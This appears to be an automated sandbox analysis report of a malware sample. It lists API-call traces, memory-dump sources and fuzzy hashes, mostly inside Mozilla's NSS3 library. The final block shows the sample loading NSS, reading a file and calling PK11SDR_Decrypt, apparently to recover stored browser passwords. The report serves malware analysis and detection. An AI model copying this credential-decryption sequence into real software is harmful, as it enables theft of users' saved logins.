                                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C9A4F51,00000000), ref: 6C9B4CAE
                                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9B4CC9
                                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9B4CF4
                                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9B4D0B
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C9A4F51,00000000), ref: 6C9B4D5E
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C9A4F51,00000000), ref: 6C9B4D68
                                                                                                                                                                                                                              • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C9B4D85
                                                                                                                                                                                                                              • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C9B4DA2
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C9B4DB9
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C9B4DCF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                              • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                              • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                              • Opcode ID: e3cd376c86a31be7e2d2066400424c3fade28c0332b8c8ce8c8d8c5d8f433964
                                                                                                                                                                                                                              • Instruction ID: 0f424597edee66d305a9d9ea3322bbc7d316fad005fb37b30cc3c770f47d74cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3cd376c86a31be7e2d2066400424c3fade28c0332b8c8ce8c8d8c5d8f433964
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0418DB2A001467BDB115F689C446FF3669AF9270CF048124EC1A6BB01E735E855DBE3
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C992DEC
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C992E00
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C992E2B
                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C992E43
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C964F1C,?,-00000001,00000000,?), ref: 6C992E74
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C964F1C,?,-00000001,00000000), ref: 6C992E88
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C992EC6
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C992EE4
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C992EF8
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C992F62
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C992F86
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6C992F9E
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C992FCA
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C99301A
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C99302E
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C993066
                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C993085
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C9930EC
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C99310C
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6C993124
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C99314C
                                                                                                                                                                                                                                • Part of subcall function 6C979180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C9A379E,?,6C979568,00000000,?,6C9A379E,?,00000001,?), ref: 6C97918D
                                                                                                                                                                                                                                • Part of subcall function 6C979180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C9A379E,?,6C979568,00000000,?,6C9A379E,?,00000001,?), ref: 6C9791A0
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407AD
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407CD
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407D6
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C8D204A), ref: 6C9407E4
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,6C8D204A), ref: 6C940864
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C940880
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,6C8D204A), ref: 6C9408CB
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408D7
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408FB
                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C99316D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3383223490-0
                                                                                                                                                                                                                              • Opcode ID: 2fe97c1286b3248b2d4fbffc32aa8116f18c5b73efb26a52cfb0cfd4265b50c1
                                                                                                                                                                                                                              • Instruction ID: 9ec5e204c29330d71acf5ff913fba51e83a1115c8af1f3dda2970e0bce5ebfe9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fe97c1286b3248b2d4fbffc32aa8116f18c5b73efb26a52cfb0cfd4265b50c1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFF19F71D006099FDF04DFA4D884BADBBB8BF19318F088169EC15A7721E731E996CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6C996910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C996943
                                                                                                                                                                                                                                • Part of subcall function 6C996910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C996957
                                                                                                                                                                                                                                • Part of subcall function 6C996910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C996972
                                                                                                                                                                                                                                • Part of subcall function 6C996910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C996983
                                                                                                                                                                                                                                • Part of subcall function 6C996910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C9969AA
                                                                                                                                                                                                                                • Part of subcall function 6C996910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C9969BE
                                                                                                                                                                                                                                • Part of subcall function 6C996910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C9969D2
                                                                                                                                                                                                                                • Part of subcall function 6C996910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C9969DF
                                                                                                                                                                                                                                • Part of subcall function 6C996910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C996A5B
                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C996D8C
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C996DC5
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C996DD6
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C996DE7
                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C996E1F
                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C996E4B
                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C996E72
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C996EA7
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C996EC4
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C996ED5
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C996EE3
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C996EF4
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C996F08
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C996F35
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C996F44
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C996F5B
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C996F65
                                                                                                                                                                                                                                • Part of subcall function 6C996C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C99781D,00000000,6C98BE2C,?,6C996B1D,?,?,?,?,00000000,00000000,6C99781D), ref: 6C996C40
                                                                                                                                                                                                                                • Part of subcall function 6C996C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C99781D,?,6C98BE2C,?), ref: 6C996C58
                                                                                                                                                                                                                                • Part of subcall function 6C996C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C99781D), ref: 6C996C6F
                                                                                                                                                                                                                                • Part of subcall function 6C996C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C996C84
                                                                                                                                                                                                                                • Part of subcall function 6C996C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C996C96
                                                                                                                                                                                                                                • Part of subcall function 6C996C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C996CAA
                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C996F90
                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C996FC5
                                                                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3 ref: 6C996FF4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1304971872-0
                                                                                                                                                                                                                              • Opcode ID: bd5e0ba98e854e8fd34b39c6e76170b176ab5fdbdfdf3abc7ff74d852ec31a81
                                                                                                                                                                                                                              • Instruction ID: 83da1a8cb548a4cfc7ef8cb7c4518d8faa0b6101fb865bb6005dc52ab43a44cb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd5e0ba98e854e8fd34b39c6e76170b176ab5fdbdfdf3abc7ff74d852ec31a81
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8B15EB0E0120A9FEF40DBE5DD44B9EBBB9AF05348F180025E815E7A40E735E965CBE1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C994C4C
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C994C60
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C994CA1
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C994CBE
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C994CD2
                                                                                                                                                                                                                              • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C994D3A
                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C994D4F
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C994DB7
                                                                                                                                                                                                                                • Part of subcall function 6C9FDD70: TlsGetValue.KERNEL32 ref: 6C9FDD8C
                                                                                                                                                                                                                                • Part of subcall function 6C9FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9FDDB4
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407AD
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407CD
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407D6
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C8D204A), ref: 6C9407E4
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,6C8D204A), ref: 6C940864
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C940880
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,6C8D204A), ref: 6C9408CB
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408D7
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408FB
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C994DD7
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C994DEC
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C994E1B
                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C994E2F
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C994E5A
                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C994E71
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C994E7A
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C994EA2
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C994EC1
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C994ED6
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C994F01
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C994F2A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 759471828-0
                                                                                                                                                                                                                              • Opcode ID: 1a1f22ba19049b95d14d889cbbabeff08d172c9e40c66e4fb280c36f9a50e259
                                                                                                                                                                                                                              • Instruction ID: 8936d61810c25cbd821ee60939afe583fb62cd3742e8afc090bb404a7a4a2baa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a1f22ba19049b95d14d889cbbabeff08d172c9e40c66e4fb280c36f9a50e259
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24B10475A002069FEB06EF68D844BAA77B8BF19318F088124ED2597B10E735E965CFD1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C95C4D5
                                                                                                                                                                                                                                • Part of subcall function 6C9ABE30: SECOID_FindOID_Util.NSS3(6C96311B,00000000,?,6C96311B,?), ref: 6C9ABE44
                                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C95C516
                                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C95C530
                                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C95C54E
                                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6C95C5CB
                                                                                                                                                                                                                              • VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6C95C712
                                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C95C725
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C95C742
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C95C751
                                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6C95C77A
                                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C95C78F
                                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C95C7A9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
                                                                                                                                                                                                                              • String ID: security
                                                                                                                                                                                                                              • API String ID: 1085474831-3315324353
                                                                                                                                                                                                                              • Opcode ID: f4a562d6b5e9b97599f3846a9d5f035db7dafaa3b0fe0b93f0d631569288002b
                                                                                                                                                                                                                              • Instruction ID: f1c81121982e56cf752e62e2351298552dd373fab400560f1a61153e1b67fc22
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4a562d6b5e9b97599f3846a9d5f035db7dafaa3b0fe0b93f0d631569288002b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7811B71C05109ABEF00EA94DC80BEF7778DF1930CF944125E901A6E91E731EA69CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • NSS_Init.NSS3(00000000), ref: 0040C112
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02F652D8,00000000,?,0041DBAC,00000000,?,?), ref: 0040C1D6
                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C1F3
                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C1FF
                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040C212
                                                                                                                                                                                                                                • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040C242
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,02F65230,0041D72E), ref: 0040C260
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,02F65158), ref: 0040C287
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,02F658D0,00000000,?,0041DBB8,00000000,?,00000000,00000000,?,02F61A80,00000000,?,0041DBB4,00000000,?), ref: 0040C405
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,02F65A70), ref: 0040C41C
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: memset.MSVCRT ref: 0040BFC3
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02F619E0), ref: 0040BFE1
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: memcpy.MSVCRT ref: 0040C082
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: PK11_FreeSlot.NSS3(?), ref: 0040C0D1
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,02F65A70,00000000,?,0041DBBC,00000000,?,00000000,02F619E0), ref: 0040C4BD
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,02F61A10), ref: 0040C4D4
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040C5A7
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C5F9
                                                                                                                                                                                                                              • NSS_Shutdown.NSS3 ref: 0040C607
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
